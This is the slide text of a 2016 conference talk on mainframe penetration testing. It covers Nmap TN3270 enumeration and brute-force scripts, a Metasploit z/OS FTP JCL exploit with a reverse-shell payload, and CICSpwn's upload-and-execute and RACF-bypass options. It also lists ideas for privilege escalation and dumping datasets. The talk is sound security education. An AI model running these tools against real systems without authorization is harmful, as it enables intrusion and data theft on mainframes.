VANGUARD SECURITY & COMPLIANCE 2016
Philip Young
ZedSec 390
CST08
Advanced Mainframe Hacking
SECURITY & COMPLIANCE CONFERENCE 2016
VANGUARD SECURITY & COMPLIANCE 2016
Disclaimer
I’m not here in the name of or on behalf of my employer. All opinions expressed here are my own.
VANGUARD SECURITY & COMPLIANCE 2016
The following are trademarks or registered trademarks of the International Business Machines Corporation:
Java and all Java-based trademarks are trademarks of Oracle and/or its affiliates.
UNIX is a registered trademark of The Open Group in the United States and other countries.
Microsoft, Windows and Windows NT are registered trademarks of Microsoft Corporation.
Linux® is the registered trademark of Linus Torvalds in the U.S. and other countries.
Kali Linux is a trademark of Offensive Security.
macOS is a trademark of Apple Inc.
Metasploit is a registered trademark of Rapid7 LLC.
VMware is a registered trademark of VMware, Inc.
Other company, product and service names may be trademarks or service marks of others.
Trademarks
CICS
CICSPlex
DB2
eServer
IBM
IBM z
IBM z Systems
IBM z13
S/390
System z
System z9
System z10
System/390
VTAM
WebSphere
z Systems
z9
z10
z13
z/Architecture
z/OS
z/VM
zEnterprise
IMS
MQSeries
MVS
NetView
OS/390
Parallel Sysplex
RACF
RMF
VANGUARD SECURITY & COMPLIANCE 2016
Purpose
This session will:
• Go over the tools introduced in yesterdays keynote
• Explain what’s going on behind the scenes
• Show you how to use the tools
VANGUARD SECURITY & COMPLIANCE 2016
Tools Covered
• Nmap
• Metasploit
• CICSpwn
• Python (NJE/TN3270 Library)
• John the Ripper
• BIRP
VANGUARD SECURITY & COMPLIANCE 2016
Kali Linux
• A Linux distrubution
• Comes pre-loaded with multiple tools:
• BURP • Metasploit • BeeF • Many more
VANGUARD SECURITY & COMPLIANCE 2016
Nmap
• Network MAP
• Uses various techniques to discover open ports
• E.G. “Syn Scan”
VANGUARD SECURITY & COMPLIANCE 2016
Service Probes
• Identify what is running on a port
• Uses TCP/UDP probes
VANGUARD SECURITY & COMPLIANCE 2016
Nmap
• Created in 1997
• By: Fyodor
• Mostly ‘C’
• Includes Service Detection
• Added Scripting Engine in ‘07
VANGUARD SECURITY & COMPLIANCE 2016
Nmap Probes
• Use the flag: ‘-sV’
• Null Probe:
Matches data sent to Nmap
• Approx 4,000 ‘Null Probes’
Let’s look at TN3270*: match tn3270 m|^\xff\xfd\x1d| p/IBM Telnet TN3270/ i/3270-REGIME/
* line 4606 in nmap-service-probes
VANGUARD SECURITY & COMPLIANCE 2016
TN3270 Null Probe
match -> ‘Match the following’
Tn3270 -> ‘with tn3270’
m|^\xff\xfd\x1d|
\xff\xfd\x1d = IAC DO TN3270E
p/IBM Telnet TN3270/ = Set to ‘IBM Telnet…’
VANGUARD SECURITY & COMPLIANCE 2016
Other Probes
• TCP Probes
• Send Data, inspect reply
• For example Network Job Entry Probe:
VANGUARD SECURITY & COMPLIANCE 2016
NJE Probe
• Sends an invalid NJE ‘OPEN’ packet
• Waits for either ‘ACK’ or ‘NAK’ in EBCDIC
VANGUARD SECURITY & COMPLIANCE 2016
Nmap Scripting Engine (NSE)
• Composed of Libraries and scripts
• Over 530 scripts available
• 121 Libraries
•Uses Lua
VANGUARD SECURITY & COMPLIANCE 2016
NSE Categories
AUTH
BROADCAST
BRUTE
DEFAULT
DISCOVERY
DOS
EXPLOIT
EXTERNAL
FUZZER
INTRUSIVE
MALWARE
SAFE
VERSION
VULN
VANGUARD SECURITY & COMPLIANCE 2016
TN3270 NSE Library
• A ‘virtual’ TN3270 terminal written in Lua
•Available: https://github.com/zedsec390/NMAP
• Allows for the following:
VANGUARD SECURITY & COMPLIANCE 2016
Invoke
• To invoke scripts use the flag
--script (\ is line continuation in linux)
nmap -sV\
--script tn3270-screen
VANGUARD SECURITY & COMPLIANCE 2016
Additional TN3270 Scripts
• VTAM® Applid Enumeration
• TSO: • User ID Enumeration • Password Brute Force
• CICS®:
• Transaction Enumeration • User ID Enumeration • User Password Brute Forcing
VANGUARD SECURITY & COMPLIANCE 2016
TSO User Enumeration
• Let’s walk through the arguments: • Note the Libraries: brute & unpwdb
Argument Definition
brute.maxthreads=100 Max number of concurrent connections. Set to 100.
userdb=‘/tmp/users.txt’ File with usernames you want to test.
tso-enum.commands=‘TSOL5’ The command used to get to TSO.
VANGUARD SECURITY & COMPLIANCE 2016
CICS Transaction Enumeration Argument Definition
brute.maxthreads=100 Max number of concurrent connections. Set to 100.
idlist=‘/tmp/users.txt’ File with CICS transactions you’re looking for.
cics-enum.commands=‘CICSTS29’ The command used to get to the CICS region.
cics-enum.path=‘/home/test’ Successfully identified transaction screenshots will be placed in this folder.
VANGUARD SECURITY & COMPLIANCE 2016
Metasploit Framework
• Developed by H.D. Moore 2003
• Moved to Ruby in 2007
• Created an easy to use exploit platform
• Chad Rikansrud (@bigendiansmalls) add JCL and z/OS® architecture support in 2016
VANGUARD SECURITY & COMPLIANCE 2016
Using MSF
• Run ‘msfconsole’
• To list all exploits: show exploits
• Run the ONLY z/os ‘exploit’ use exploit/mainframe/ftp/ftp_jcl_creds
• Show the options with: show options
• Fill in the options you need
• Select which ‘payload’ you want to use
VANGUARD SECURITY & COMPLIANCE 2016
Set options
• Exploit options:
Option Definition
FTPUSER User ID to use.
FTPPASS Password to use.
RHOST FTP Hostname/IP address of target LPAR
RPORT FTP port (use Nmap)
VANGUARD SECURITY & COMPLIANCE 2016
Metasploit Payload Options
Now select a payload: set payload cmd/mainframe/reverse_shell_jcl
Change the payload options:
Option Definition
LHOST Our Hostname or IP address
LPORT The port you want metasploit to open a listener on.
VANGUARD SECURITY & COMPLIANCE 2016
CICSpwn
• Release this year by Ayoul
• Relies on CEMT/CEDA transaction IDs (for now)
• Uses CEMT to upload and execute JCL/REXX
• Can be used to assess CICS and break in to environments
• Requires Python 2.7
VANGUARD SECURITY & COMPLIANCE 2016
Interesting Options
Invoke with: python cicspwn
Flag Definition
-i Gather information
-A Test all options
-s Upload JCL to be executed by CICS user (requires CEMT)
--bypass Will bypass RACF® if CEDA is available.
VANGUARD SECURITY & COMPLIANCE 2016
Escalation
• So far only network based
• What happens after access is granted?
VANGUARD SECURITY & COMPLIANCE 2016
Some Ideas
• Storage ‘scrapers’ to gather system information (think ‘IPLINFO’ but built in to metasploit)
• Automated APF tools to attempt privilege escalation through zapping APF authorized modules
• Data dumping tools to grab all datasets
• SMP/E corruption
VANGUARD SECURITY & COMPLIANCE 2016
Why Not?
• Make your own tools?
I’d prefer the tools come with what the experts need, so they have it without knowing about it